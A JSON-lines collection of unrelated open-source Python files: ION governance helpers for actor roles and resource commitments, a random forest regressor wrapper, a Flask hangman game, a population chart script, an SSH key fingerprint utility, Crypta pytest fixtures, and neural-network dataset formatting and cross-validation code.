Build the message header used by governance to identify the actor and roles.\n \"\"\"\n return {MSG_HEADER_ACTOR: actor_id or DEFAULT_ACTOR_ID,\n MSG_HEADER_ROLES: actor_roles or {}}\n\n\ndef get_actor_header(actor_id):\n \"\"\"\n Returns the actor related message headers for a specific actor_id.\n Will return anonymous if the actor_id is not found.\n \"\"\"\n actor_header = build_actor_header(DEFAULT_ACTOR_ID, {})\n\n if actor_id:\n try:\n header_roles = find_roles_by_actor(actor_id)\n actor_header = build_actor_header(actor_id, header_roles)\n except Exception:\n log.exception(\"Cannot build actor message header\")\n\n return actor_header\n\n\ndef has_org_role(role_header=None, org_governance_name=None, role_name=None):\n \"\"\"\n Check the ion-actor-roles message header to see if this actor has the specified role in the specified Org.\n Parameter role_name can be a string with the name of a user role or a list of user role names, which will\n recursively call this same method for each role name in the list until one is found or the list is exhausted.\n \"\"\"\n if role_header is None or org_governance_name is None or role_name is None:\n raise BadRequest(\"One of the parameters to this method are not set\")\n\n if isinstance(role_name, list):\n for role in role_name:\n if has_org_role(role_header, org_governance_name, role):\n return True\n else:\n if org_governance_name in role_header:\n if role_name in role_header[org_governance_name]:\n return True\n\n return False\n\n\ndef find_roles_by_actor(actor_id=None):\n \"\"\"\n Returns a dict of all User Roles roles by Org Name associated with the specified actor\n \"\"\"\n if actor_id is None or not len(actor_id):\n raise BadRequest(\"The actor_id parameter is missing\")\n\n role_dict = dict()\n\n gov_controller = bootstrap.container_instance.governance_controller\n role_list, _ = gov_controller.rr.find_objects(actor_id, PRED.hasRole, RT.UserRole)\n\n for role in role_list:\n if role.org_governance_name not in role_dict:\n role_dict[role.org_governance_name] = list()\n\n role_dict[role.org_governance_name].append(role.governance_name)\n\n # Membership in ION Org is implied\n if gov_controller.system_root_org_name not in role_dict:\n role_dict[gov_controller.system_root_org_name] = list()\n\n role_dict[gov_controller.system_root_org_name].append(MEMBER_ROLE)\n\n return role_dict\n\n\ndef get_system_actor():\n \"\"\"\n Returns the ION system actor defined in the Resource Registry as ActorIdentity resource.\n Returns None if not found.\n \"\"\"\n try:\n gov_controller = bootstrap.container_instance.governance_controller\n system_actor_name = get_safe(gov_controller.CFG, \"system.system_actor\", \"ionsystem\")\n system_actor, _ = gov_controller.rr.find_resources(RT.ActorIdentity, name=system_actor_name, id_only=False)\n if not system_actor:\n return None\n\n return system_actor[0]\n\n except Exception:\n log.exception(\"Cannot retrieve system actor\")\n return None\n\n\ndef is_system_actor(actor_id):\n \"\"\"\n Is this the specified actor_id the system actor\n \"\"\"\n system_actor = get_system_actor()\n if system_actor is not None and system_actor._id == actor_id:\n return True\n\n return False\n\ndef get_system_actor_header(system_actor=None):\n \"\"\"\n Returns the actor related message headers for a the ION System Actor\n \"\"\"\n try:\n if system_actor is None:\n system_actor = get_system_actor()\n\n if not system_actor or system_actor is None:\n log.warn(\"The ION System Actor was not found; defaulting to anonymous actor\")\n actor_header = get_actor_header(None)\n else:\n actor_header = get_actor_header(system_actor._id)\n\n return actor_header\n\n except Exception:\n log.exception(\"Could not get system actor header\")\n return get_actor_header(None)\n\n\ndef get_valid_principal_commitments(principal_id=None, consumer_id=None):\n \"\"\"\n Returns the list of valid commitments for the specified principal (org or actor.\n If optional consumer_id (actor) is supplied, then filtered by consumer_id\n \"\"\"\n log.debug(\"Finding commitments for principal: %s\", principal_id)\n if principal_id is None:\n return None\n\n try:\n gov_controller = bootstrap.container_instance.governance_controller\n commitments, _ = gov_controller.rr.find_objects(principal_id, PRED.hasCommitment, RT.Commitment, id_only=False)\n if not commitments:\n return None\n\n cur_time = get_ion_ts_millis()\n commitment_list = [com for com in commitments if (consumer_id == None or com.consumer == consumer_id) and \\\n (int(com.expiration) == 0 or (int(com.expiration) > 0 and cur_time < int(com.expiration)))]\n if commitment_list:\n return commitment_list\n\n except Exception:\n log.exception(\"Could not determine actor resource commitments\")\n\n return None\n\n\ndef get_valid_resource_commitments(resource_id=None, actor_id=None):\n \"\"\"\n Returns the list of valid commitments for the specified resource.\n If optional actor_id is supplied, then filtered by actor_id\n \"\"\"\n log.debug(\"Finding commitments for resource_id: %s and actor_id: %s\", resource_id, actor_id)\n if resource_id is None:\n return None\n\n try:\n gov_controller = bootstrap.container_instance.governance_controller\n commitments, _ = gov_controller.rr.find_subjects(RT.Commitment, PRED.hasTarget, resource_id, id_only=False)\n if not commitments:\n return None\n\n cur_time = get_ion_ts_millis()\n commitment_list = [com for com in commitments if (actor_id == None or com.consumer == actor_id) and \\\n (int(com.expiration) == 0 or (int(com.expiration) > 0 and cur_time < int(com.expiration)))]\n if commitment_list:\n return commitment_list\n\n except Exception:\n log.exception(\"Could not determine actor resource commitments\")\n\n return None\n\n\ndef has_valid_resource_commitments(actor_id, resource_id):\n \"\"\"\n Returns a ResourceCommitmentStatus object indicating the commitment status between this resource/actor\n Can only have an exclusive commitment if actor already has a shared commitment.\n \"\"\"\n ret_status = IonObject(OT.ResourceCommitmentStatus)\n commitments = get_valid_resource_commitments(resource_id, actor_id)\n if commitments is None:\n # No commitments were found between this resource_id and actor_id - so return default object with\n # fields set to False\n return ret_status\n\n ret_status.shared = True\n\n for com in commitments:\n if com.commitment.exclusive == True:\n # Found an exclusive commitment\n ret_status.exclusive = True\n return ret_status\n\n # Only a shared commitment was found\n return ret_status\n\n\ndef has_valid_shared_resource_commitment(actor_id=None, resource_id=None):\n \"\"\"\n This method returns True if the specified actor_id has acquired shared access for the specified resource id, otherwise False.\n \"\"\"\n if actor_id is None or resource_id is None:\n raise BadRequest('One or all of the method parameters are not set')\n\n commitment_status = has_valid_resource_commitments(actor_id, resource_id)\n\n return commitment_status.shared\n\n\ndef has_valid_exclusive_resource_commitment(actor_id=None, resource_id=None):\n \"\"\"\n This method returns True if the specified actor_id has acquired exclusive access for the specified resource id, otherwise False.\n \"\"\"\n if actor_id is None or resource_id is None:\n raise BadRequest('One or all of the method parameters are not set')\n\n commitment_status = has_valid_resource_commitments(actor_id, resource_id)\n\n # If the resource has not been acquired for sharing, then it can't have been acquired exclusively\n if not commitment_status.shared:\n return False\n\n return commitment_status.exclusive\n\n\ndef is_resource_owner(actor_id=None, resource_id=None):\n \"\"\"\n Returns True if the specified actor_id is an Owner of the specified resource id, otherwise False\n \"\"\"\n if actor_id is None or resource_id is None:\n raise BadRequest('One or all of the method parameters are not set')\n\n gov_controller = bootstrap.container_instance.governance_controller\n owners = gov_controller.rr.find_objects(subject=resource_id, predicate=PRED.hasOwner, object_type=RT.ActorIdentity, id_only=True)\n\n if actor_id not in owners[0]:\n return False\n\n return True\n\n\nclass GovernanceHeaderValues(object):\n \"\"\"\n A helper class for containing governance values from a message header\n \"\"\"\n\n def __init__(self, headers, process=None, resource_id_required=True):\n \"\"\"\n Helpers for retrieving governance related values: op, actor_id, actor_roles, resource_id from the message header\n @param headers:\n @param resource_id_required: True if the message header must have a resource-id field and value.\n \"\"\"\n if not headers or not isinstance(headers, dict):\n raise BadRequest(\"The headers parameter is not a valid message header dictionary\")\n\n self._op = headers.get(MSG_HEADER_OP, \"Unknown-Operation\")\n\n if process is not None and hasattr(process, 'name'):\n self._process_name = process.name\n else:\n if 'process' in headers:\n if getattr(headers['process'], 'name'):\n self._process_name = headers['process'].name\n else:\n self._process_name = \"Unknown-Process\"\n else:\n self._process_name = \"Unknown-Process\"\n\n\n # The self.name references below should be provided by the running ION process (service, agent, etc),\n # which will be using this class.\n if MSG_HEADER_ACTOR in headers:\n self._actor_id = headers[MSG_HEADER_ACTOR]\n else:\n raise Inconsistent('%s(%s) has been denied since the ion-actor-id can not be found in the message headers' % (self._process_name, self._op))\n\n if MSG_HEADER_ROLES in headers:\n self._actor_roles = headers[MSG_HEADER_ROLES]\n else:\n raise Inconsistent('%s(%s) has been denied since the ion-actor-roles can not be found in the message headers' % (self._process_name, self._op))\n\n if MSG_HEADER_RESOURCE_ID in headers:\n self._resource_id = headers[MSG_HEADER_RESOURCE_ID]\n else:\n if resource_id_required:\n raise Inconsistent('%s(%s) has been denied since the resource-id can not be found in the message headers' % (self._process_name, self._op))\n self._resource_id = ''\n\n self._user_context_id = headers.get(MSG_HEADER_USER_CONTEXT_ID, None)\n\n @property\n def op(self):\n return self._op\n\n @property\n def actor_id(self):\n return self._actor_id\n\n @property\n def actor_roles(self):\n return self._actor_roles\n\n @property\n def resource_id(self):\n return self._resource_id\n\n @property\n def user_context_id(self):\n return self._user_context_id\n\n @property\n def process_name(self):\n return self._process_name\n","repo_name":"scionrep/scioncc","sub_path":"src/pyon/core/governance/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14432898409","text":"from work.models.model_wrapper import *\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.compose import TransformedTargetRegressor\nfrom sklearn.metrics import mean_absolute_error\n\nfrom work.sampling.samplers import RFR_space\n\nclass RFR(ModelWrapper):\n def __init__(self, prefix, dataset_name, label, spliter=None):\n ModelWrapper.__init__(self, prefix, dataset_name, label, spliter=spliter)\n \n def params(self):\n return {\"n_estimators\":100,\n \"criterion\":'mse',\n \"max_depth\":None,\n \"min_samples_split\":2,\n \"min_samples_leaf\":1,\n \"min_weight_fraction_leaf\":0.0,\n \"max_features\":'auto',\n \"max_leaf_nodes\":None,\n \"min_impurity_decrease\":0.0,\n \"min_impurity_split\":None,\n \"bootstrap\":True,\n \"oob_score\":True,\n \"n_jobs\":None,\n \"random_state\":90125,\n \"verbose\":0,\n \"warm_start\":False,\n \"ccp_alpha\":0.0,\n \"max_samples\":0.7,\n \"scaler\":\"\",\n \"transformer\":\"Standard\"}\n\n def make(self, ptemp):\n ptemp_ = copy.deepcopy(ptemp)\n if \"seeds\" in ptemp_:\n del ptemp_[\"seeds\"]\n \n scaler = self.get_scaler(ptemp_)\n transformer = self.get_transformer(ptemp_) \n \n model = RandomForestRegressor(**ptemp_)\n pipe = make_pipeline(scaler, model)\n regr = TransformedTargetRegressor(pipe, transformer=transformer)\n\n return regr\n\n def predict_val(self, regr, X, oob=False):\n if oob:\n return regr.transformer_.inverse_transform(\n regr.regressor_.steps[1][1].oob_prediction_)\n else:\n return regr.predict(X)\n\n def eval_val(self, regr, X, y, oob=False):\n yhat = self.predict_val(regr, X, oob=oob)\n return mean_absolute_error(y, yhat)\n\n def get_search_space(self, country=None, version=None, n=None,\n fast=False, stop_after=-1):\n return RFR_space(fast=fast)\n \n def string(self):\n return \"RF\"\n","repo_name":"Leonardbcm/EPFDAML","sub_path":"work/models/RFR.py","file_name":"RFR.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"27635095430","text":"from flask import Flask, request, redirect, render_template, session\napp = Flask(__name__)\napp.secret_key = \"It's a secret to everybody\"\n\n@app.route(\"/\")\ndef start_page():\n return render_template(\"start.html\")\n\n@app.route(\"/submit_answer\", methods=[\"POST\"])\ndef submit_answer():\n print(request.form[\"answer\"])\n session[\"answer\"] = request.form[\"answer\"]\n session[\"incorrect_guesses\"] = \"\"\n progress = \"\"\n for i in range(0,len(request.form[\"answer\"])):\n if request.form[\"answer\"][i] == \" \":\n progress += \" \"\n else:\n progress += \"_\"\n session[\"progress\"] = progress\n return redirect(\"/game\")\n\n@app.route(\"/game\")\ndef game_page():\n answer = session[\"answer\"]\n return render_template(\"game.html\")\n\n@app.route(\"/submit_guess\", methods=[\"POST\"])\ndef submit_guess():\n # print(\"your guess is: \" + request.form[\"guess\"])\n if request.form[\"guess\"] in session[\"answer\"]:\n old_progress = session[\"progress\"]\n new_progress = \"\"\n\n for i in range(0, len(session[\"answer\"])):\n if session[\"answer\"][i] == request.form[\"guess\"]:\n new_progress += request.form[\"guess\"]\n else:\n new_progress += old_progress[i]\n session[\"progress\"] = new_progress\n else:\n session[\"incorrect_guesses\"] += request.form[\"guess\"]\n return redirect(\"/game\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"mazurasdf/Python_Aug2022","sub_path":"Flask/hangman/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10627672735","text":"import leercsv\nimport graficadora\n\nlistV = leercsv.list_diccionario('./WORLD.csv')\ncountry = input(\"Digite el pais del cual quiere conocer su poblacion en el tiempo:\")\naños = ['2022 Population','2020 Population','2015 Population','2010 Population','2000 Population','1990 Population','1980 Population','1970 Population']\nfiltradoPais = list(filter(lambda pais: pais[\"Country/Territory\"]==country ,listV))\nprint(filtradoPais)\ndef valores(x):\n listVacia =[]\n for i in años:\n listVacia.append(x[i])\n return listVacia\npoblacionValor = list(map(valores ,filtradoPais))\n\n\nlabels = list(map(lambda x: x[0:4],años))\nprint(labels)\nvalores = poblacionValor[0]\nprint(valores) \nvaloresN = list(map(lambda i: int(i),valores)) \ngraficadora.graficaBarras(country,labels,valoresN) \n\n","repo_name":"AndresFabianRamirez/EJERCICIOS_DE_PYTHON","sub_path":"pkg/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10761395234","text":"# Code from \nimport base64, hashlib\n\n# paste your key on line 6\nkey = \"\"\"\nKEydAtaPubl?PrivkeYfILe= username\n\"\"\"\n\ndef lineToFingerprint(line):\n key = base64.b64decode(line.strip().split()[1].encode('ascii'))\n fp_plain = hashlib.md5(key).hexdigest()\n return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2]))\n\nprint(lineToFingerprint(key))\n\n# Public Key\n# python3 SSH_to_FF.py \n# 9g:4f:39:1c:1f:6e:30:6b:gg:44:05:3b:c2:g6:d4:18\n","repo_name":"subedi/scriptbox","sub_path":"SSH_to_FF.py","file_name":"SSH_to_FF.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"80782519","text":"import pytest\n\nfrom crypta.lib.proto.user_data.user_data_stats_pb2 import TUserDataStats\nfrom crypta.lib.python import proto\nfrom crypta.lib.python.yt import schema_utils\nfrom crypta.lib.python.yt.test_helpers import (\n tables,\n tests,\n)\nfrom crypta.lookalike.lib.python.utils.config import config\nfrom crypta.lookalike.proto.yt_node_names_pb2 import TYtNodeNames\nfrom crypta.siberia.bin.common.proto.crypta_id_user_data_pb2 import TCryptaIdUserData\nfrom crypta.siberia.bin.make_id_to_crypta_id.lib.maker.id_to_crypta_id_pb2 import TIdToCryptaId\n\n\npytest_plugins = [\n 'crypta.lib.python.nirvana.test_helpers.fixtures',\n 'crypta.lookalike.lib.python.test_utils.fixtures',\n 'crypta.siberia.bin.common.test_helpers.fixtures',\n]\n\nYT_NODE_NAMES = TYtNodeNames()\n\n\n@pytest.fixture\ndef describe_input():\n crypta_id_user_data = tables.YsonTable(\n file_path='crypta_id_user_data.yson',\n cypress_path=config.FOR_DESCRIPTION_BY_CRYPTAID_TABLE,\n on_write=tables.OnWrite(\n sort_by=['crypta_id'],\n attributes={'schema': schema_utils.get_schema_from_proto(TCryptaIdUserData)},\n row_transformer=proto.row_transformer(TCryptaIdUserData),\n ),\n )\n\n id_to_crypta_id = tables.YsonTable(\n file_path='id_to_crypta_id.yson',\n cypress_path='//home/crypta/production/siberia/id_to_crypta_id',\n on_write=tables.OnWrite(\n sort_by=['id', 'id_type'],\n attributes={'schema': schema_utils.get_schema_from_proto(TIdToCryptaId)},\n ),\n )\n\n user_data_stats = tables.YsonTable(\n file_path='user_data_stats.yson',\n cypress_path='//home/crypta/testing/lab/data/crypta_id/UserDataStats',\n on_write=tables.OnWrite(\n attributes={'schema': schema_utils.get_schema_from_proto(TUserDataStats)},\n row_transformer=proto.row_transformer(TUserDataStats),\n ),\n )\n\n return [\n (crypta_id_user_data, tests.TableIsNotChanged()),\n (id_to_crypta_id, tests.TableIsNotChanged()),\n (user_data_stats, tests.TableIsNotChanged()),\n ]\n\n\n@pytest.fixture\ndef date():\n return '2022-01-19'\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/conftest (82).py","file_name":"conftest (82).py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1526563547","text":"import pandas as pd\nimport json\nimport numpy as np\nimport csv\nimport os\nfrom NeuralNetwork import NeuralNetwork as nn\n\ndef get_data_from_txt(csv_file):\n\t#reading dataset from csv\n\tlines = open(csv_file,'r').readlines()\n\n\tinputs = []\n\toutputs = []\n\n\tfor line in lines:\n\t\tline = line[:-1]\n\t\tline_parts = line.split(';')\n\t\tinstance, output = line_parts[0], line_parts[1]\n\n\t\tinputs.append(instance.split(','))\n\t\toutputs.append(output.split(','))\n\n\treturn pd.DataFrame(inputs), pd.DataFrame(outputs)\n\ndef read_file(csv_file, delimiter=None):\n\tlines = []\n\twith open(csv_file) as csv_file:\n\t\tif delimiter is None:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\telse:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=delimiter)\n\t\tfor row in csv_reader:\n\t\t\tlines.append(row)\n\n\treturn lines\n\ndef parser_network_file(network_file):\n\t#reading lines from the file\n\tlines = read_file(network_file)\n\n\t#assigning the values to corresponding variables with the correct datatypes\n\treg_factor = float(lines[0][0])\n\n\tn_layers = []\n\t\n\tfor layer in lines[1:]:\n\t\tn_layer = int(layer[0])\t\n\t\tn_layers.append(n_layer)\n\n\treturn reg_factor, n_layers\n\n\ndef parser_initial_weights_file(initial_weights_file):\n\t#reading lines from the file\n\tlayers = read_file(initial_weights_file, ';')\n\n\tnetwork_weights = []\n\t\n\t#Iterating over the lines (layers) to catch weights for each neuron\n\tfor layer in layers:\n\t\tlayer_weights = []\n\t\tfor neuron in layer:\n\t\t\t#Splitting each neuron and converting it from string to float\n\t\t\tneuron_weights = neuron.split(',')\n\t\t\tneuron_weights = [float(weight) for weight in neuron_weights]\n\t\t\t#Saving the weights in a new list for each layer\n\t\t\tlayer_weights.append(neuron_weights)\n\n\t\t#saving weights for each layer\n\t\tnetwork_weights.append(layer_weights)\n\n\t#converting network_weights from list of list to 2D np.array \n\tnetwork_weights = [np.array(xi) for xi in network_weights]\n\n\treturn network_weights\n\ndef format_datasets(csv_files):\n\t#removing any pre-existent txt files in datasets directory\n\tos.system('rm ./datasets/*.txt')\n\n\tfor csv_file in csv_files:\n\t\tif csv_file == 'datasets/wine.data':\n\t\t\t#wine dataset\n\n\t\t\t#reading lines from original csv file\n\t\t\tlines = read_file(csv_file, delimiter=',')\n\n\t\t\t#processing each line and obtained separated file for attributes and outputs.\n\t\t\tfor line in lines:\n\t\t\t\twrite_line_to_csv('datasets/wine_dataset_instances.txt',line[1:], 'a')\n\t\t\t\tif line[0] == '1':\n\t\t\t\t\twrite_line_to_csv('datasets/wine_dataset_classes.txt', ['1.0','0.0','0.0'], 'a')\n\t\t\t\telif line[0] == '2':\n\t\t\t\t\twrite_line_to_csv('datasets/wine_dataset_classes.txt', ['0.0','1.0','0.0'], 'a')\n\t\t\t\telif line[0] == '3':\n\t\t\t\t\twrite_line_to_csv('datasets/wine_dataset_classes.txt', ['0.0','0.0', '1.0'], 'a')\n\n\t\t\t#Combining attributes and outputs files in the desired format.\n\t\t\ta=open('datasets/wine_dataset_instances.txt','r').readlines()\n\t\t\tb=open('datasets/wine_dataset_classes.txt','r').readlines()\n\t\t\t\n\t\t\twith open('datasets/wine_dataset.txt','w') as out:\n\t\t\t for i in range(len(a)):\n\t\t\t \tout.write(a[i].rstrip() + ';' + b[i])\n\n\t\t\t#removing temporary files.\n\t\t\tos.system('rm ./datasets/wine_dataset_instances.txt')\n\t\t\tos.system('rm ./datasets/wine_dataset_classes.txt')\n\n\t\tif csv_file == 'datasets/pima.tsv':\n\t\t\t#pima dataset\n\n\t\t\t#reading lines from the original tsv file\n\t\t\tlines = read_file(csv_file, delimiter='\t')\n\n\t\t\t#removing the first line (headers)\n\t\t\tlines = lines[1:]\n\n\t\t\tfor line in lines:\n\t\t\t\twrite_line_to_csv('datasets/pima_dataset_instances.txt',line[:-1], 'a')\n\t\t\t\t\n\t\t\t\tif line[-1] == '1':\n\t\t\t\t\twrite_line_to_csv('datasets/pima_dataset_classes.txt', ['1.0','0.0'], 'a')\n\t\t\t\telif line[-1] == '0':\n\t\t\t\t\twrite_line_to_csv('datasets/pima_dataset_classes.txt', ['0.0','1.0'], 'a')\n\n\t\t\t#Combining attributes and outputs files in the desired format.\n\t\t\ta=open('datasets/pima_dataset_instances.txt','r').readlines()\n\t\t\tb=open('datasets/pima_dataset_classes.txt','r').readlines()\n\t\t\t\n\t\t\twith open('datasets/pima_dataset.txt','w') as out:\n\t\t\t for i in range(len(a)):\n\t\t\t \tout.write(a[i].rstrip() + ';' + b[i])\n\n\t\t\t#removing temporary files.\n\t\t\tos.system('rm ./datasets/pima_dataset_instances.txt')\n\t\t\tos.system('rm ./datasets/pima_dataset_classes.txt')\n\n\t\tif csv_file == 'datasets/ionosphere.data':\n\t\t\t#wine dataset\n\n\t\t\t#reading lines from original csv file\n\t\t\tlines = read_file(csv_file, delimiter=',')\n\n\t\t\t#processing each line and obtained separated file for attributes and outputs.\n\t\t\tfor line in lines:\n\t\t\t\twrite_line_to_csv('datasets/ionosphere_dataset_instances.txt',line[:-1], 'a')\n\t\t\t\tif line[-1] == 'g':\n\t\t\t\t\twrite_line_to_csv('datasets/ionosphere_dataset_classes.txt', ['1.0','0.0'], 'a')\n\t\t\t\telif line[-1] == 'b':\n\t\t\t\t\twrite_line_to_csv('datasets/ionosphere_dataset_classes.txt', ['0.0','1.0'], 'a')\n\n\t\t\t#Combining attributes and outputs files in the desired format.\n\t\t\ta=open('datasets/ionosphere_dataset_instances.txt','r').readlines()\n\t\t\tb=open('datasets/ionosphere_dataset_classes.txt','r').readlines()\n\t\t\t\n\t\t\twith open('datasets/ionosphere_dataset.txt','w') as out:\n\t\t\t for i in range(len(a)):\n\t\t\t \tout.write(a[i].rstrip() + ';' + b[i])\n\n\t\t\t#removing temporary files.\n\t\t\tos.system('rm ./datasets/ionosphere_dataset_instances.txt')\n\t\t\tos.system('rm ./datasets/ionosphere_dataset_classes.txt')\n\n\ndef write_line_to_csv(csv_file, list_values, mode):\n\twith open(csv_file, mode=mode) as csv_file:\n\t\tcsv_writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tcsv_writer.writerow(list_values)\n\ndef apply_standard_score(df):\n\tfor column in df:\n\t\tdf[column] = (df[column] - df[column].mean())/(df[column].std(ddof=0)+ 0.000001)\n\n\treturn df\n\ndef cross_validation(dataset_name, reg_factor, n_layers, network_weights, inputs,outputs, kfolds, n_cross_val=1):\n\ttotal_accuracies = []\n\ttotal_F1s = []\n\n\tif dataset_name == 'datasets/wine_dataset.txt':\n\t\tunique_class_values = ['1','2','3']\n\telif dataset_name == 'datasets/ionosphere_dataset.txt':\n\t\tunique_class_values = ['good', 'bad']\n\telif dataset_name == 'datasets/pima_dataset.txt':\n\t\tunique_class_values = ['0','1']\n\n\tcsv_file = dataset_name[:-4] + '_' + str(reg_factor) + '_' + str(n_layers) + '-metrics.csv'\n\n\tif not os.path.exists(csv_file):\n\t\t#Bulding csv file headers line for any number of classes\n\t\theaders_csv = ['cross_val', 'kfold','accuracy']\n\t\theaders_csv += ['class_' + str(unique_class) + '_recall' for unique_class in unique_class_values]\n\t\theaders_csv += ['mean_recall']\n\t\theaders_csv += ['class_' + str(unique_class) + '_precision' for unique_class in unique_class_values]\n\t\theaders_csv += ['mean_precision']\n\t\theaders_csv += ['class_' + str(unique_class) + '_F1' for unique_class in unique_class_values]\n\t\theaders_csv += ['mean_F1']\n\n\t\twrite_line_to_csv(csv_file, headers_csv, 'w')\n\n\tfor cross_val in range(n_cross_val):\n\t\tprint(\"Cross validation # \" + str(cross_val+1))\n\t\tprint(\"----------------------------\")\n\t\taccuracies = []\n\t\tF1s_classes = []\n\n\t\t#Reordering data randomly (outputs not needed because it will be accesed by index)\n\t\tinputs = inputs.reindex(np.random.permutation(inputs.index))\n\n\t\t#Getting unique outputs in the current dataset (resetting index and dropping the old index)\n\t\tunique_outputs = outputs.drop_duplicates().reset_index(drop=True)\n\n\t\t#List containing the separated dataframes for each class.\n\t\tdata_classes = []\n\n\t\t#Iterating over the outputs to separate the inputs in classes.\n\t\tfor index, unique_output in unique_outputs.iterrows():\n\t\t\tclass_indexes = []\n\t\t\tfor index2,output in outputs.iterrows():\n\t\t\t\t#Verifying if the rows are equal between output and unique_output. (3 classes)\n\t\t\t\tif unique_output.shape[0] == 3 and unique_output.eq(output).drop_duplicates().shape[0] == 1:\n\t\t\t\t\tclass_indexes.append(index2)\n\t\t\t\t#Verification for 2 classes\n\t\t\t\telif unique_output.shape[0] == 2 and unique_output.eq(output).drop_duplicates().iloc[0] == True:\n\t\t\t\t\tclass_indexes.append(index2)\n\n\t\t\t#Appending part of the dataframe for the corresponding class_indexes to data_classes\n\t\t\tdata_class = inputs.iloc[class_indexes]\n\t\t\tdata_classes.append(data_class)\n\n\t\tfor kfold in range(kfolds):\n\t\t\tprint(\"Working on kfold \" + str(kfold+1) + \" of \" + str(kfolds))\n\t\t\ttest_data = pd.DataFrame.from_records([])\n\t\t\ttraining_data = pd.DataFrame.from_records([])\n\n\t\t\tfor data_class in data_classes:\n\t\t\t\t#Splitting data into 'kfolds' folds\n\t\t\t\tsplitted_data_class = np.array_split(data_class,kfolds)\n\n\t\t\t\ttest_data_class = splitted_data_class[kfold]\n\t\t\t\ttraining_data_class = pd.DataFrame.from_records([])\n\n\t\t\t\tfor i in range(kfolds):\n\t\t\t\t\tif i != kfold:\n\t\t\t\t\t\ttraining_data_class = pd.concat([training_data_class, splitted_data_class[i]])\n\n\t\t\t\ttest_data = pd.concat([test_data, test_data_class])#.reset_index(drop=True)\n\t\t\t\ttraining_data = pd.concat([training_data, training_data_class])#.reset_index(drop=True)\n\n\t\t\t#Instantiating Neural Network object\n\t\t\tneural_network = nn(reg_factor, n_layers, network_weights, \n\t\t\t\t\t\t\t\t\ttraining_data.reset_index(drop=True), \n\t\t\t\t\t\t\t\t\toutputs.iloc[list(training_data.index)].reset_index(drop=True),\n\t\t\t\t\t\t\t\t\t0.20, 0.9, 0.000005, 800, 50, 200, True, False)\n\n\t\t\t#Fitting the neural network model\n\t\t\tneural_network.backPropagation()\n\n\t\t\t#Performing actual predictions\n\t\t\tpredictions = neural_network.predict(test_data)\n\n\t\t\t#Getting confusion matrix\n\t\t\tcf = getConfusionMatrix(predictions, test_data, outputs, unique_outputs)\n\n\t\t\t#print(cf)\n\n\t\t\t#Getting some metrics from the confusion matrix to validate the model\n\t\t\taccuracy, recalls, precisions, F1s = calcMetrics(cf, unique_outputs)\n\n\t\t\t#Concatenating metrics into a list to be exported to a csv file\n\t\t\tlist_of_metric_values = [cross_val+1, kfold+1] + [accuracy] + recalls + [np.mean(recalls)] + precisions + [np.mean(precisions)] + F1s + [np.mean(F1s)]\n\t\t\t\n\t\t\t#Writing list of metrics computed for the current fold to a csv file.\n\t\t\twrite_line_to_csv(csv_file, list_of_metric_values, 'a')\n\n\t\t\t#Collecting accuracies in order to show this information after cross validation execution.\n\t\t\taccuracies.append(accuracy)\n\t\t\tF1s_classes.append(np.mean(F1s))\n\t\t\ttotal_accuracies.append(accuracy)\n\t\t\ttotal_F1s.append(np.mean(F1s))\n\n\t\tprint(\"Accuracy: \" + str(np.mean(accuracies)) + \" ± \" + str(np.std(accuracies)))\n\t\tprint(\"F1 Measure: \" + str(np.mean(F1s_classes)) + \" ± \" + str(np.std(F1s_classes)))\n\n\tprint(\"---------------------------------------------\")\n\tprint(\"Total Accuracy: \" + str(np.mean(total_accuracies)) + \" ± \" + str(np.std(total_accuracies)))\n\tprint(\"Total F1-measure: \" + str(np.mean(total_F1s)) + \" ± \" + str(np.std(total_F1s)))\n\n\ndef getConfusionMatrix(predictions, test_data, outputs, unique_outputs):\n\tconfusion_matrix = np.zeros((len(unique_outputs), len(unique_outputs)), dtype=int)\n\n\tx_val = -1\n\ty_val = -1\n\t\n\tfor index,row in predictions.iterrows():\n\t\tfor index2, unique_output in unique_outputs.iterrows():\n\t\t\tif unique_output.shape[0] == 3:\n\t\t\t\tif unique_output.eq(row).drop_duplicates().shape[0] == 1:\n\t\t\t\t\tx_val = index2\n\t\t\t\tif unique_output.eq(outputs.iloc[index]).drop_duplicates().shape[0] == 1:\n\t\t\t\t\ty_val = index2\n\t\t\telif unique_output.shape[0] == 2:\n\t\t\t\tif unique_output.eq(row).drop_duplicates().iloc[0] == True:\n\t\t\t\t\tx_val = index2\n\t\t\t\tif unique_output.eq(outputs.iloc[index]).drop_duplicates().iloc[0] == True:\n\t\t\t\t\ty_val = index2\n\n\t\tconfusion_matrix[x_val][y_val] += 1\n\n\treturn confusion_matrix\n\ndef calcMetrics(confusion_matrix, unique_outputs):\n\t#Calculating accuracy\n\taccuracy = np.sum(np.diagonal(confusion_matrix)) / np.sum(confusion_matrix)\n\n\t#Calculating recall\n\trecalls = []\n\tfor index, value in enumerate(unique_outputs):\n\t\trow = confusion_matrix[index, :]\n\t\trecall = confusion_matrix[index][index] / row.sum() if row.sum() else 0\n\t\trecalls.append(recall)\n\n\t#Calculating precision\n\tprecisions = []\n\tfor index, value in enumerate(unique_outputs):\n\t\tcolumn = confusion_matrix[:,index]\n\t\tprecision = 